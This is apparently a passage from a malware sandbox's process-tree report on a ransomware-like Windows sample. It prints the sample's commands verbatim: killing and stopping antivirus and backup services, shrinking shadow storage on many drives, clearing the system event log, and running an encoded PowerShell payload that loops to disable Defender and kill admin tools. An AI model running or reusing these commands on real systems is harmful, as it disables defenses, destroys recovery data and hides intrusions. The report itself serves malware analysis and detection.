  2⤵
  PID:2056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im tmwscsvc.exe"
  2⤵
  PID:3372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tmwscsvc.exe
    3⤵
    PID:1556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB"
  2⤵
  PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im ResponseService.exe"
  2⤵
  PID:428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ResponseService.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im PccNTMon.exe"
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im PccNTMon.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB"
  2⤵
  PID:4900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB"
  2⤵
  PID:4136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im SupportConnector.exe"
  2⤵
  PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im SupportConnector.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB"
  2⤵
  PID:792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im vastsvc.exe"
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vastsvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4164
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB"
  2⤵
  PID:3812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB"
  2⤵
  PID:4696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im NortonSecurity.exe"
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im NortonSecurity.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB"
  2⤵
  PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im McAfeeFramework.exe"
  2⤵
  PID:3428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im McAfeeFramework.exe
    3⤵
    PID:4484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im SophosSAU.exe"
  2⤵
  PID:4928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im SophosSAU.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop Avast Antivirus! /y"
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\net.exe
    net stop Avast Antivirus! /y
    3⤵
    PID:1212
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Avast Antivirus! /y
      4⤵
      PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"
  2⤵
  PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB"
  2⤵
  PID:2328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop TMResponse /y"
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\net.exe
    net stop TMResponse /y
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TMResponse /y
      4⤵
      PID:4012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB"
  2⤵
  PID:640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB"
  2⤵
  PID:4808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop BackupExecAgentBrowser /y"
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentBrowser /y
    3⤵
    PID:2624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB"
  2⤵
  PID:3292
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB"
  2⤵
  PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB"
  2⤵
  PID:4776
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB"
  2⤵
  PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop AOTAgentSvc /y"
  2⤵
  PID:644
- - C:\Windows\SysWOW64\net.exe
    net stop AOTAgentSvc /y
    3⤵
    PID:1332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AOTAgentSvc /y
      4⤵
      PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop TMBMServer /y"
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\net.exe
    net stop TMBMServer /y
    3⤵
    PID:1140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TMBMServer /y
      4⤵
      PID:2260
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wevtutil cl system"
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil cl system
    3⤵
    - Clears Windows event logs
    PID:3584
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop iVPAgent /y"
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\net.exe
    net stop iVPAgent /y
    3⤵
    PID:4640
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop iVPAgent /y
      4⤵
      PID:2496
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB"
  2⤵
  PID:4812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB"
  2⤵
  PID:3416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop Trend Micro /y"
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\net.exe
    net stop Trend Micro /y
    3⤵
    PID:5000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Trend Micro /y
      4⤵
      PID:5072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop Web Service Communicator /y"
  2⤵
  PID:2280
- - C:\Windows\SysWOW64\net.exe
    net stop Web Service Communicator /y
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Web Service Communicator /y
      4⤵
      PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"
  2⤵
  PID:3908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB"
  2⤵
  PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop Tmccst /y"
  2⤵
  PID:3736
- - C:\Windows\SysWOW64\net.exe
    net stop Tmccst /y
    3⤵
    PID:2616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Tmccst /y
      4⤵
      PID:3364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop Tmlisten /y"
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\net.exe
    net stop Tmlisten /y
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Tmlisten /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop Ntrtscan /y"
  2⤵
  PID:4508
- - C:\Windows\SysWOW64\net.exe
    net stop Ntrtscan /y
    3⤵
    PID:3032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Ntrtscan /y
      4⤵
      PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB"
  2⤵
  PID:2824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "net stop TmWSCSvc /y"
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\net.exe
    net stop TmWSCSvc /y
    3⤵
    PID:4320
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "powershell.exe -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHIAcwAnACsAJwBoAGUAbABsAC4AZQAnACsAJwB4AGUAawBwAG4AIAAnACsAJwAtAEEAJwArACcAcgAnACsAJwBnAHUAbQAnACsAJwBlAG4AJwArACcAdABMACcAKwAnAGkAJwArACcAcwB0ACAAJwArACcAZwBWAHQALQAnACsAJwBlAHAAIABiAHkAcABhAHMAcwAgACcAKwAnAC0AdwAgAGgAaQBkAGQAZQAnACsAJwBuACAAJwArACcALQBjACAAawBwAG4AJwArACcAdwBoAGkAJwArACcAbABlACgASAAnACsAJwBLAGkAJwArACcAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAAnACsAJwBTACcAKwAnAGUAJwArACcAdAAnACsAJwAtAE0AcABQAHIAZQAnACsAJwBmACcAKwAnAGUAcgBlACcAKwAnAG4AYwBlACcAKwAnACAALQBEAGkAcwBhAGIAbABlAFIAJwArACcAZQBhAGwAJwArACcAdABpAG0AZQBNAG8AJwArACcAbgAnACsAJwBpAHQAbwByAGkAJwArACcAbgBnACAAJwArACcASABLAGkAJwArACcAdAAnACsAJwByAHUAJwArACcAZQAgACcAKwAnAH0AawBwACcAKwAnAG4AZwBWAHQACgBTAHQAYQByACcAKwAnAHQAJwArACcALQAnACsAJwBQAHIAbwBjACcAKwAnAGUAcwBzACAALQBGAGkAbABlAFAAYQB0ACcAKwAnAGgAJwArACcAIABrAHAAJwArACcAbgBwAG8AdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsACcAKwAnAC4AZQB4AGUAJwArACcAawBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAbQBlACcAKwAnAG4AdABMAGkAcwB0ACAAJwArACcAZwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAJwArACcAcwAnACsAJwAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQAnACsAJwBjACAAawBwACcAKwAnAG4AJwArACcAdwBoAGkAJwArACcAbABlACcAKwAnACgASABLAGkAdAByAHUAZQApAHsAIAAnACsAJwB0ACcAKwAnAGEAcwBrAGsAaQBsACcAKwAnAGwAIAAvAGYAIAAvAGkAJwArACcAbQAgAHQAYQBzAGsAJwArACcAawBpAGwAbAAuAGUAeABlACcAKwAnAH0AawBwAG4AZwBWACcAKwAnAHQACgAnACsAJwBTAHQAJwArACcAYQByAHQAJwArACcALQBQACcAKwAnAHIAbwBjAGUAcwBzACAALQBGACcAKwAnAGkAbABlAFAAJwArACcAYQB0AGgAIAAnACsAJwBrAHAAJwArACcAbgAnACsAJwBwAG8AJwArACcAdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsAC4AZQAnACsAJwB4AGUAawAnACsAJwBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAJwArACcAbQBlAG4AdABMAGkAcwAnACsAJwB0ACcAKwAnACAAJwArACcAZwAnACsAJwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAcwAgAC0AdwAnACsAJwAgACcAKwAnAGgAaQBkAGQAJwArACcAZQAnACsAJwBuACcAKwAnACAALQAnACsAJwBjACAAJwArACcAawBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAAnACsAJwByAHUAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAvAGkAbQAgAHQAJwArACcAYQAnACsAJwBzACcAKwAnAGsAJwArACcAbABpAHMAdAAuAGUAJwArACcAeABlAH0AawBwAG4AZwBWAHQACgBTAHQAJwArACcAYQByACcAKwAnAHQALQBQAHIAbwBjAGUAJwArACcAcwBzACcAKwAnACAALQBGACcAKwAnAGkAbABlAFAAYQAnACsAJwB0AGgAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbAAnACsAJwBsAC4AZQB4AGUAJwArACcAawBwAG4AIAAtAEEAcgAnACsAJwBnAHUAbQBlAG4AdABMAGkAJwArACcAcwB0ACAAZwBWAHQALQBlAHAAIABiACcAKwAnAHkAJwArACcAcABhACcAKwAnAHMAJwArACcAcwAgACcAKwAnAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACAAawBwAG4AdwAnACsAJwBoAGkAbABlACgASABLAGkAdAByACcAKwAnAHUAJwArACcAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAnACsAJwAvAGkAJwArACcAbQAgAHQAYQAnACsAJwBzAGsAbQBnAHIALgAnACsAJwBlAHgAZQAnACsAJwB9ACcAKwAnAGsAcABuAGcAJwArACcAVgB0AAoAJwArACcAUwB0AGEAcgB0AC0AUAByAG8AJwArACcAYwBlAHMAcwAnACsAJwAgAC0ARgBpAGwAZQAnACsAJwBQAGEAdABoACAAawBwAG4AJwArACcAcABvAHcAZQByAHMAaABlAGwAJwArACcAbAAuAGUAeABlACcAKwAnAGsAcAAnACsAJwBuACAALQBBAHIAZwAnACsAJwB1AG0AZQAnACsAJwBuACcAKwAnAHQATABpAHMAdAAnACsAJwAgAGcAVgB0AC0AZQBwACAAJwArACcAYgB5AHAAJwArACcAYQBzACcAKwAnAHMAIAAnACsAJwAtAHcAIABoAGkAZABkAGUAbgAnACsAJwAgAC0AJwArACcAYwAgAGsAcAAnACsAJwBuACcAKwAnAHcAaABpAGwAZQAoAEgASwBpAHQAcgAnACsAJwB1AGUAKQB7ACcAKwAnACAAdABhAHMAawBrAGkAbABsACAAJwArACcALwBmACcAKwAnACAAJwArACcALwAnACsAJwBpAG0AIABjAG0AZAAuAGUAeABlAH0AJwArACcAawBwAG4AZwBWAHQACgBTACcAKwAnAHQAJwArACcAYQByACcAKwAnAHQALQAnACsAJwBQAHIAbwAnACsAJwBjAGUAcwAnACsAJwBzACAALQBGAGkAbAAnACsAJwBlAFAAYQAnACsAJwB0AGgAJwArACcAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbABsACcAKwAnAC4AZQB4AGUAawAnACsAJwBwAG4AIAAtACcAKwAnAEEAJwArACcAcgBnAHUAJwArACcAbQBlAG4AdAAnACsAJwBMAGkAcwAnACsAJwB0ACAAZwBWAHQALQBlAHAAIABiAHkAcABhAHMAJwArACcAcwAnACsAJwAgAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACcAKwAnACAAJwArACcAawAnACsAJwBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAB0AGEAcwBrAGsAaQBsAGwAJwArACcAIAAnACsAJwAvAGYAIAAvAGkAbQAnACsAJwAgAHAAcwAuACcAKwAnAGUAJwArACcAeAAnACsAJwBlAH0AawBwAG4AZwBWAHQAJwApACAAIAAtAEMAcgBFAHAAbABBAGMARQAnAGcAVgB0ACcALABbAEMASABBAHIAXQAzADkAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAQwBIAEEAcgBdADcAMgArAFsAQwBIAEEAcgBdADcANQArAFsAQwBIAEEAcgBdADEAMAA1ACkALABbAEMASABBAHIAXQAzADYAIAAtAHIARQBQAGwAQQBDAEUAJwBrAHAAbgAnACwAWwBDAEgAQQByAF0AMwA0ACkAIAB8ACAAJgAgACgAIAAkAHYARQByAGIAbwBTAEUAUAByAEUAZgBFAFIAZQBuAEMARQAuAHQAbwBzAHQAcgBpAE4AZwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAG8ASQBOACcAJwApAAoA"
  2⤵
  PID:3872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHIAcwAnACsAJwBoAGUAbABsAC4AZQAnACsAJwB4AGUAawBwAG4AIAAnACsAJwAtAEEAJwArACcAcgAnACsAJwBnAHUAbQAnACsAJwBlAG4AJwArACcAdABMACcAKwAnAGkAJwArACcAcwB0ACAAJwArACcAZwBWAHQALQAnACsAJwBlAHAAIABiAHkAcABhAHMAcwAgACcAKwAnAC0AdwAgAGgAaQBkAGQAZQAnACsAJwBuACAAJwArACcALQBjACAAawBwAG4AJwArACcAdwBoAGkAJwArACcAbABlACgASAAnACsAJwBLAGkAJwArACcAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAAnACsAJwBTACcAKwAnAGUAJwArACcAdAAnACsAJwAtAE0AcABQAHIAZQAnACsAJwBmACcAKwAnAGUAcgBlACcAKwAnAG4AYwBlACcAKwAnACAALQBEAGkAcwBhAGIAbABlAFIAJwArACcAZQBhAGwAJwArACcAdABpAG0AZQBNAG8AJwArACcAbgAnACsAJwBpAHQAbwByAGkAJwArACcAbgBnACAAJwArACcASABLAGkAJwArACcAdAAnACsAJwByAHUAJwArACcAZQAgACcAKwAnAH0AawBwACcAKwAnAG4AZwBWAHQACgBTAHQAYQByACcAKwAnAHQAJwArACcALQAnACsAJwBQAHIAbwBjACcAKwAnAGUAcwBzACAALQBGAGkAbABlAFAAYQB0ACcAKwAnAGgAJwArACcAIABrAHAAJwArACcAbgBwAG8AdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsACcAKwAnAC4AZQB4AGUAJwArACcAawBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAbQBlACcAKwAnAG4AdABMAGkAcwB0ACAAJwArACcAZwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAJwArACcAcwAnACsAJwAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQAnACsAJwBjACAAawBwACcAKwAnAG4AJwArACcAdwBoAGkAJwArACcAbABlACcAKwAnACgASABLAGkAdAByAHUAZQApAHsAIAAnACsAJwB0ACcAKwAnAGEAcwBrAGsAaQBsACcAKwAnAGwAIAAvAGYAIAAvAGkAJwArACcAbQAgAHQAYQBzAGsAJwArACcAawBpAGwAbAAuAGUAeABlACcAKwAnAH0AawBwAG4AZwBWACcAKwAnAHQACgAnACsAJwBTAHQAJwArACcAYQByAHQAJwArACcALQBQACcAKwAnAHIAbwBjAGUAcwBzACAALQBGACcAKwAnAGkAbABlAFAAJwArACcAYQB0AGgAIAAnACsAJwBrAHAAJwArACcAbgAnACsAJwBwAG8AJwArACcAdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsAC4AZQAnACsAJwB4AGUAawAnACsAJwBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAJwArACcAbQBlAG4AdABMAGkAcwAnACsAJwB0ACcAKwAnACAAJwArACcAZwAnACsAJwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAcwAgAC0AdwAnACsAJwAgACcAKwAnAGgAaQBkAGQAJwArACcAZQAnACsAJwBuACcAKwAnACAALQAnACsAJwBjACAAJwArACcAawBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAAnACsAJwByAHUAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAvAGkAbQAgAHQAJwArACcAYQAnACsAJwBzACcAKwAnAGsAJwArACcAbABpAHMAdAAuAGUAJwArACcAeABlAH0AawBwAG4AZwBWAHQACgBTAHQAJwArACcAYQByACcAKwAnAHQALQBQAHIAbwBjAGUAJwArACcAcwBzACcAKwAnACAALQBGACcAKwAnAGkAbABlAFAAYQAnACsAJwB0AGgAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbAAnACsAJwBsAC4AZQB4AGUAJwArACcAawBwAG4AIAAtAEEAcgAnACsAJwBnAHUAbQBlAG4AdABMAGkAJwArACcAcwB0ACAAZwBWAHQALQBlAHAAIABiACcAKwAnAHkAJwArACcAcABhACcAKwAnAHMAJwArACcAcwAgACcAKwAnAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACAAawBwAG4AdwAnACsAJwBoAGkAbABlACgASABLAGkAdAByACcAKwAnAHUAJwArACcAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAnACsAJwAvAGkAJwArACcAbQAgAHQAYQAnACsAJwBzAGsAbQBnAHIALgAnACsAJwBlAHgAZQAnACsAJwB9ACcAKwAnAGsAcABuAGcAJwArACcAVgB0AAoAJwArACcAUwB0AGEAcgB0AC0AUAByAG8AJwArACcAYwBlAHMAcwAnACsAJwAgAC0ARgBpAGwAZQAnACsAJwBQAGEAdABoACAAawBwAG4AJwArACcAcABvAHcAZQByAHMAaABlAGwAJwArACcAbAAuAGUAeABlACcAKwAnAGsAcAAnACsAJwBuACAALQBBAHIAZwAnACsAJwB1AG0AZQAnACsAJwBuACcAKwAnAHQATABpAHMAdAAnACsAJwAgAGcAVgB0AC0AZQBwACAAJwArACcAYgB5AHAAJwArACcAYQBzACcAKwAnAHMAIAAnACsAJwAtAHcAIABoAGkAZABkAGUAbgAnACsAJwAgAC0AJwArACcAYwAgAGsAcAAnACsAJwBuACcAKwAnAHcAaABpAGwAZQAoAEgASwBpAHQAcgAnACsAJwB1AGUAKQB7ACcAKwAnACAAdABhAHMAawBrAGkAbABsACAAJwArACcALwBmACcAKwAnACAAJwArACcALwAnACsAJwBpAG0AIABjAG0AZAAuAGUAeABlAH0AJwArACcAawBwAG4AZwBWAHQACgBTACcAKwAnAHQAJwArACcAYQByACcAKwAnAHQALQAnACsAJwBQAHIAbwAnACsAJwBjAGUAcwAnACsAJwBzACAALQBGAGkAbAAnACsAJwBlAFAAYQAnACsAJwB0AGgAJwArACcAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbABsACcAKwAnAC4AZQB4AGUAawAnACsAJwBwAG4AIAAtACcAKwAnAEEAJwArACcAcgBnAHUAJwArACcAbQBlAG4AdAAnACsAJwBMAGkAcwAnACsAJwB0ACAAZwBWAHQALQBlAHAAIABiAHkAcABhAHMAJwArACcAcwAnACsAJwAgAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACcAKwAnACAAJwArACcAawAnACsAJwBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAB0AGEAcwBrAGsAaQBsAGwAJwArACcAIAAnACsAJwAvAGYAIAAvAGkAbQAnACsAJwAgAHAAcwAuACcAKwAnAGUAJwArACcAeAAnACsAJwBlAH0AawBwAG4AZwBWAHQAJwApACAAIAAtAEMAcgBFAHAAbABBAGMARQAnAGcAVgB0ACcALABbAEMASABBAHIAXQAzADkAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAQwBIAEEAcgBdADcAMgArAFsAQwBIAEEAcgBdADcANQArAFsAQwBIAEEAcgBdADEAMAA1ACkALABbAEMASABBAHIAXQAzADYAIAAtAHIARQBQAGwAQQBDAEUAJwBrAHAAbgAnACwAWwBDAEgAQQByAF0AMwA0ACkAIAB8ACAAJgAgACgAIAAkAHYARQByAGIAbwBTAEUAUAByAEUAZgBFAFIAZQBuAEMARQAuAHQAbwBzAHQAcgBpAE4AZwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAG8ASQBOACcAJwApAAoA
    3⤵
    PID:4696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ Set-MpPreference -DisableRealtimeMonitoring $true }"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5020
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im taskkill.exe}"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4508
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3544
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2328
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4860
